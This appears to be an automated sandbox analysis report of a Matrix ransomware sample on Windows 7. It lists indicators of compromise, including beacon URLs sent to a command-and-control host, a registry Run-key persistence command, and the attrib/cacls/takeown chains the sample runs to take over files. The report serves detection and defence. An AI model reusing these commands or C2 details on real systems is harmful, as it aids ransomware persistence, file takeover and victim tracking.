matrix | 46dc49be65d7165e2a6009854a4f27f0088230199e61e0555cb1bd266535874a

Analysis

max time kernel
154s
max time network
77s
platform
windows7_x64
resource
win7
submitted
11-08-2020 12:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

foo/383497fda5ca670a06dc688443c2011b.exe

Score

10^/10

matrix discovery persistence ransomware

Malware Config

Signatures

Matrix Ransomware 5 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	flow	ioc
HTTP URL	2	http://murikos.in/add.php?apikey=BKTqstat&compuser=AVGLFESB\|Admin&sid=9Jpdm4jlfeZbbhrn&phase=START
HTTP URL	3	http://murikos.in/add.php?apikey=BKTqstat&compuser=AVGLFESB\|Admin&sid=IZb9Dgph9anMZt9W&phase=START
HTTP URL	4	http://murikos.in/add.php?apikey=BKTqstat&compuser=AVGLFESB\|Admin&sid=9Jpdm4jlfeZbbhrn&phase=L_05D38E07E3C44508_7593_1GB
HTTP URL	5	http://murikos.in/add.php?apikey=BKTqstat&compuser=AVGLFESB\|Admin&sid=9Jpdm4jlfeZbbhrn&phase=L_DONE_10
HTTP URL	6	http://murikos.in/add.php?apikey=BKTqstat&compuser=AVGLFESB\|Admin&sid=9Jpdm4jlfeZbbhrn&phase=L_DONE_100

Executes dropped EXE 1 IoCs

pid	Process
1404	n383497fda5ca670a06dc688443c2011b.exe

Loads dropped DLL 2 IoCs

pid	Process
316	383497fda5ca670a06dc688443c2011b.exe
316	383497fda5ca670a06dc688443c2011b.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1444	Process not Found
1476	Process not Found
1648	Process not Found
1100	takeown.exe
1112	takeown.exe
668	takeown.exe
1948	takeown.exe
676	Process not Found
1900	takeown.exe
1320	Process not Found
1924	Process not Found
1988	Process not Found
1700	takeown.exe
760	takeown.exe
1888	Process not Found
1136	Process not Found
1792	Process not Found
1472	Process not Found
1192	Process not Found
816	Process not Found
1176	Process not Found
1412	Process not Found
2000	takeown.exe
1684	takeown.exe
240	takeown.exe
1700	Process not Found
1920	Process not Found
332	Process not Found
1792	Process not Found
1668	takeown.exe
1176	Process not Found
836	takeown.exe
668	Process not Found
1984	Process not Found
744	Process not Found
1632	takeown.exe
836	takeown.exe
1136	Process not Found
556	Process not Found
268	Process not Found
1504	takeown.exe
1220	takeown.exe
1920	takeown.exe
1544	Process not Found
1948	Process not Found
1816	takeown.exe
2036	Process not Found
1044	Process not Found
1552	Process not Found
1068	takeown.exe
1388	takeown.exe
888	takeown.exe
1556	Process not Found
1852	Process not Found
1056	Process not Found
1988	Process not Found
1452	Process not Found
1400	takeown.exe
1608	takeown.exe
1788	takeown.exe
1552	takeown.exe
1628	Process not Found
1484	Process not Found
592	Process not Found

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\README = "\"C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe\" \"C:\\Users\\Admin\\AppData\\Roaming\\#What_Wrong_With_Files#.rtf\""	reg.exe

Drops desktop.ini file(s) 3 IoCs

description	ioc	Process
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1131729243-447456001-3632642222-1000\desktop.ini	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\desktop.ini	383497fda5ca670a06dc688443c2011b.exe

Enumerates connected drives 3 TTPs 22 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\Y:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\U:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\K:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\H:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\V:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\R:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\M:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\G:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\F:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\T:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\Q:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\O:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\N:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\L:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\J:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\X:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\W:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\S:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\P:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\I:	383497fda5ca670a06dc688443c2011b.exe
File opened (read-only)	\??\E:	383497fda5ca670a06dc688443c2011b.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt	383497fda5ca670a06dc688443c2011b.exe
File created	C:\Program Files\VideoLAN\VLC\#What_Wrong_With_Files#.rtf	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\THEMES14\PIXEL\PIXEL.ELM	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_VideoInset.png	Process not Found
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_SelectionSubpicture.png	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\tipresx.dll.mui	attrib.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui	attrib.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png	attrib.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Mask1.png	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-static.png	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansRegular.ttf	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Microsoft Office\Stationery\1033\SEAMARBL.JPG	383497fda5ca670a06dc688443c2011b.exe
File created	C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENFR\#What_Wrong_With_Files#.rtf	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-over-select.png	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages.properties	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web.xml	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.config	383497fda5ca670a06dc688443c2011b.exe
File created	C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\#What_Wrong_With_Files#.rtf	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\performance.png	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png	Process not Found
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_ButtonGraphic.png	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\desktop.ini	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\notes-static.png	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_ButtonGraphic.png	Process not Found
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VS_ComponentSigningIntermediate.cer	383497fda5ca670a06dc688443c2011b.exe
File created	C:\Program Files\Common Files\Microsoft Shared\Stationery\#What_Wrong_With_Files#.rtf	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7\1033\VBOB6.CHM	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_RGB_PAL.wmv	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_ButtonGraphic.png	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h	383497fda5ca670a06dc688443c2011b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\#What_Wrong_With_Files#.rtf	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsdeu.xml	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\PowerPoint.en-us\SETUP.XML	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\ParentMenuButtonIcon.png	Process not Found
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png	Process not Found
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\THEMES14\ICE\PREVIEW.GIF	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\FREN\MSB1FREN.ITS	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt.txt	383497fda5ca670a06dc688443c2011b.exe
File created	C:\Program Files\Java\jdk1.7.0_80\#What_Wrong_With_Files#.rtf	383497fda5ca670a06dc688443c2011b.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.jpg	383497fda5ca670a06dc688443c2011b.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	1968	takeown.exe
Token: SeTakeOwnershipPrivilege	472	takeown.exe
Token: SeTakeOwnershipPrivilege	1100	takeown.exe
Token: SeTakeOwnershipPrivilege	1592	takeown.exe
Token: SeTakeOwnershipPrivilege	1068	takeown.exe
Token: SeTakeOwnershipPrivilege	1848	takeown.exe
Token: SeTakeOwnershipPrivilege	1780	takeown.exe
Token: SeTakeOwnershipPrivilege	1644	takeown.exe
Token: SeTakeOwnershipPrivilege	1980	takeown.exe
Token: SeTakeOwnershipPrivilege	1228	takeown.exe
Token: SeTakeOwnershipPrivilege	1572	takeown.exe
Token: SeTakeOwnershipPrivilege	1400	takeown.exe
Token: SeTakeOwnershipPrivilege	1056	takeown.exe
Token: SeTakeOwnershipPrivilege	1820	takeown.exe
Token: SeTakeOwnershipPrivilege	1792	takeown.exe
Token: SeTakeOwnershipPrivilege	1404	takeown.exe
Token: SeTakeOwnershipPrivilege	1444	takeown.exe
Token: SeTakeOwnershipPrivilege	1648	takeown.exe
Token: SeTakeOwnershipPrivilege	2036	takeown.exe
Token: SeTakeOwnershipPrivilege	752	takeown.exe
Token: SeTakeOwnershipPrivilege	1064	takeown.exe
Token: SeTakeOwnershipPrivilege	1512	takeown.exe
Token: SeTakeOwnershipPrivilege	1816	takeown.exe
Token: SeTakeOwnershipPrivilege	1788	takeown.exe
Token: SeTakeOwnershipPrivilege	1692	takeown.exe
Token: SeTakeOwnershipPrivilege	1908	takeown.exe
Token: SeTakeOwnershipPrivilege	904	takeown.exe
Token: SeTakeOwnershipPrivilege	1036	takeown.exe
Token: SeTakeOwnershipPrivilege	1940	takeown.exe
Token: SeTakeOwnershipPrivilege	1496	takeown.exe
Token: SeTakeOwnershipPrivilege	240	takeown.exe
Token: SeTakeOwnershipPrivilege	1088	takeown.exe
Token: SeTakeOwnershipPrivilege	1796	takeown.exe
Token: SeTakeOwnershipPrivilege	1896	takeown.exe
Token: SeTakeOwnershipPrivilege	1544	takeown.exe
Token: SeTakeOwnershipPrivilege	1968	takeown.exe
Token: SeTakeOwnershipPrivilege	1104	takeown.exe
Token: SeTakeOwnershipPrivilege	1912	takeown.exe
Token: SeTakeOwnershipPrivilege	1388	takeown.exe
Token: SeTakeOwnershipPrivilege	1068	takeown.exe
Token: SeTakeOwnershipPrivilege	1492	takeown.exe
Token: SeTakeOwnershipPrivilege	1840	takeown.exe
Token: SeTakeOwnershipPrivilege	1876	takeown.exe
Token: SeTakeOwnershipPrivilege	812	takeown.exe
Token: SeTakeOwnershipPrivilege	1956	takeown.exe
Token: SeTakeOwnershipPrivilege	1916	takeown.exe
Token: SeTakeOwnershipPrivilege	1100	takeown.exe
Token: SeTakeOwnershipPrivilege	1488	takeown.exe
Token: SeTakeOwnershipPrivilege	816	takeown.exe
Token: SeTakeOwnershipPrivilege	1812	takeown.exe
Token: SeTakeOwnershipPrivilege	1868	takeown.exe
Token: SeTakeOwnershipPrivilege	1680	takeown.exe
Token: SeTakeOwnershipPrivilege	1504	takeown.exe
Token: SeTakeOwnershipPrivilege	760	takeown.exe
Token: SeTakeOwnershipPrivilege	1112	takeown.exe
Token: SeTakeOwnershipPrivilege	1948	takeown.exe
Token: SeTakeOwnershipPrivilege	1412	takeown.exe
Token: SeTakeOwnershipPrivilege	1700	takeown.exe
Token: SeTakeOwnershipPrivilege	1836	takeown.exe
Token: SeTakeOwnershipPrivilege	1632	takeown.exe
Token: SeTakeOwnershipPrivilege	1972	takeown.exe
Token: SeTakeOwnershipPrivilege	844	takeown.exe
Token: SeTakeOwnershipPrivilege	888	takeown.exe
Token: SeTakeOwnershipPrivilege	1400	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 316 wrote to memory of 1404	316	383497fda5ca670a06dc688443c2011b.exe	24
PID 316 wrote to memory of 1404	316	383497fda5ca670a06dc688443c2011b.exe	24
PID 316 wrote to memory of 1404	316	383497fda5ca670a06dc688443c2011b.exe	24
PID 316 wrote to memory of 1404	316	383497fda5ca670a06dc688443c2011b.exe	24
PID 316 wrote to memory of 1608	316	383497fda5ca670a06dc688443c2011b.exe	25
PID 316 wrote to memory of 1608	316	383497fda5ca670a06dc688443c2011b.exe	25
PID 316 wrote to memory of 1608	316	383497fda5ca670a06dc688443c2011b.exe	25
PID 316 wrote to memory of 1608	316	383497fda5ca670a06dc688443c2011b.exe	25
PID 1608 wrote to memory of 1632	1608	cmd.exe	27
PID 1608 wrote to memory of 1632	1608	cmd.exe	27
PID 1608 wrote to memory of 1632	1608	cmd.exe	27
PID 1608 wrote to memory of 1632	1608	cmd.exe	27
PID 316 wrote to memory of 1900	316	383497fda5ca670a06dc688443c2011b.exe	29
PID 316 wrote to memory of 1900	316	383497fda5ca670a06dc688443c2011b.exe	29
PID 316 wrote to memory of 1900	316	383497fda5ca670a06dc688443c2011b.exe	29
PID 316 wrote to memory of 1900	316	383497fda5ca670a06dc688443c2011b.exe	29
PID 1900 wrote to memory of 2000	1900	cmd.exe	31
PID 1900 wrote to memory of 2000	1900	cmd.exe	31
PID 1900 wrote to memory of 2000	1900	cmd.exe	31
PID 1900 wrote to memory of 2000	1900	cmd.exe	31
PID 1900 wrote to memory of 1992	1900	cmd.exe	32
PID 1900 wrote to memory of 1992	1900	cmd.exe	32
PID 1900 wrote to memory of 1992	1900	cmd.exe	32
PID 1900 wrote to memory of 1992	1900	cmd.exe	32
PID 1900 wrote to memory of 1968	1900	cmd.exe	33
PID 1900 wrote to memory of 1968	1900	cmd.exe	33
PID 1900 wrote to memory of 1968	1900	cmd.exe	33
PID 1900 wrote to memory of 1968	1900	cmd.exe	33
PID 316 wrote to memory of 2040	316	383497fda5ca670a06dc688443c2011b.exe	34
PID 316 wrote to memory of 2040	316	383497fda5ca670a06dc688443c2011b.exe	34
PID 316 wrote to memory of 2040	316	383497fda5ca670a06dc688443c2011b.exe	34
PID 316 wrote to memory of 2040	316	383497fda5ca670a06dc688443c2011b.exe	34
PID 2040 wrote to memory of 884	2040	cmd.exe	36
PID 2040 wrote to memory of 884	2040	cmd.exe	36
PID 2040 wrote to memory of 884	2040	cmd.exe	36
PID 2040 wrote to memory of 884	2040	cmd.exe	36
PID 2040 wrote to memory of 524	2040	cmd.exe	37
PID 2040 wrote to memory of 524	2040	cmd.exe	37
PID 2040 wrote to memory of 524	2040	cmd.exe	37
PID 2040 wrote to memory of 524	2040	cmd.exe	37
PID 2040 wrote to memory of 472	2040	cmd.exe	38
PID 2040 wrote to memory of 472	2040	cmd.exe	38
PID 2040 wrote to memory of 472	2040	cmd.exe	38
PID 2040 wrote to memory of 472	2040	cmd.exe	38
PID 316 wrote to memory of 556	316	383497fda5ca670a06dc688443c2011b.exe	39
PID 316 wrote to memory of 556	316	383497fda5ca670a06dc688443c2011b.exe	39
PID 316 wrote to memory of 556	316	383497fda5ca670a06dc688443c2011b.exe	39
PID 316 wrote to memory of 556	316	383497fda5ca670a06dc688443c2011b.exe	39
PID 556 wrote to memory of 1584	556	cmd.exe	41
PID 556 wrote to memory of 1584	556	cmd.exe	41
PID 556 wrote to memory of 1584	556	cmd.exe	41
PID 556 wrote to memory of 1584	556	cmd.exe	41
PID 556 wrote to memory of 1576	556	cmd.exe	42
PID 556 wrote to memory of 1576	556	cmd.exe	42
PID 556 wrote to memory of 1576	556	cmd.exe	42
PID 556 wrote to memory of 1576	556	cmd.exe	42
PID 556 wrote to memory of 1100	556	cmd.exe	43
PID 556 wrote to memory of 1100	556	cmd.exe	43
PID 556 wrote to memory of 1100	556	cmd.exe	43
PID 556 wrote to memory of 1100	556	cmd.exe	43
PID 316 wrote to memory of 1048	316	383497fda5ca670a06dc688443c2011b.exe	44
PID 316 wrote to memory of 1048	316	383497fda5ca670a06dc688443c2011b.exe	44
PID 316 wrote to memory of 1048	316	383497fda5ca670a06dc688443c2011b.exe	44
PID 316 wrote to memory of 1048	316	383497fda5ca670a06dc688443c2011b.exe	44

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
240	Process not Found
1908	attrib.exe
112	attrib.exe
760	attrib.exe
1468	Process not Found
1848	attrib.exe
536	attrib.exe
1848	Process not Found
612	Process not Found
1624	attrib.exe
752	attrib.exe
1276	attrib.exe
1512	attrib.exe
1048	attrib.exe
2008	Process not Found
2040	Process not Found
1452	Process not Found
1460	attrib.exe
1904	attrib.exe
1040	attrib.exe
816	attrib.exe
928	Process not Found
1324	Process not Found
1768	Process not Found
2016	Process not Found
1828	Process not Found
1768	attrib.exe
1048	attrib.exe
568	attrib.exe
1668	attrib.exe
1464	attrib.exe
1444	Process not Found
1976	Process not Found
1824	attrib.exe
1488	attrib.exe
1644	attrib.exe
1896	attrib.exe
1336	attrib.exe
1488	Process not Found
1680	attrib.exe
1872	attrib.exe
912	attrib.exe
1848	attrib.exe
1748	attrib.exe
748	attrib.exe
816	Process not Found
556	Process not Found
968	Process not Found
1332	attrib.exe
1860	attrib.exe
1944	attrib.exe
1484	Process not Found
960	Process not Found
1692	attrib.exe
676	attrib.exe
836	attrib.exe
1176	Process not Found
672	Process not Found
1572	Process not Found
1056	Process not Found
1996	Process not Found
748	Process not Found
1788	Process not Found
1636	Process not Found

C:\Users\Admin\AppData\Local\Temp\foo\383497fda5ca670a06dc688443c2011b.exe
"C:\Users\Admin\AppData\Local\Temp\foo\383497fda5ca670a06dc688443c2011b.exe"
1⤵
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:316
- C:\Users\Admin\AppData\Local\Temp\foo\n383497fda5ca670a06dc688443c2011b.exe
  "C:\Users\Admin\AppData\Local\Temp\foo\n383497fda5ca670a06dc688443c2011b.exe" -n
  2⤵
  - Executes dropped EXE
  PID:1404
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v README /t REG_SZ /d "\"%ProgramFiles%\Windows NT\Accessories\wordpad.exe\" \"C:\Users\Admin\AppData\Roaming\#What_Wrong_With_Files#.rtf"" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1608
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v README /t REG_SZ /d "\"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe\" \"C:\Users\Admin\AppData\Roaming\#What_Wrong_With_Files#.rtf"" /f
    3⤵
    - Adds Run key to start application
    PID:1632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.jpg""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.jpg"
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.jpg" /E /G Admin:F /C
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg"
    3⤵
    PID:884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg" /E /G Admin:F /C
    3⤵
    PID:524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:472
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.jpg""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.jpg"
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.jpg" /E /G Admin:F /C
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\GreenBubbles.jpg""
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\GreenBubbles.jpg"
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\GreenBubbles.jpg" /E /G Admin:F /C
    3⤵
    PID:1536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\GreenBubbles.jpg"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg""
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg"
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg" /E /G Admin:F /C
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\Common Files\Microsoft Shared\Stationery\Monet.jpg""
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\Common Files\Microsoft Shared\Stationery\Monet.jpg"
    3⤵
    PID:1804
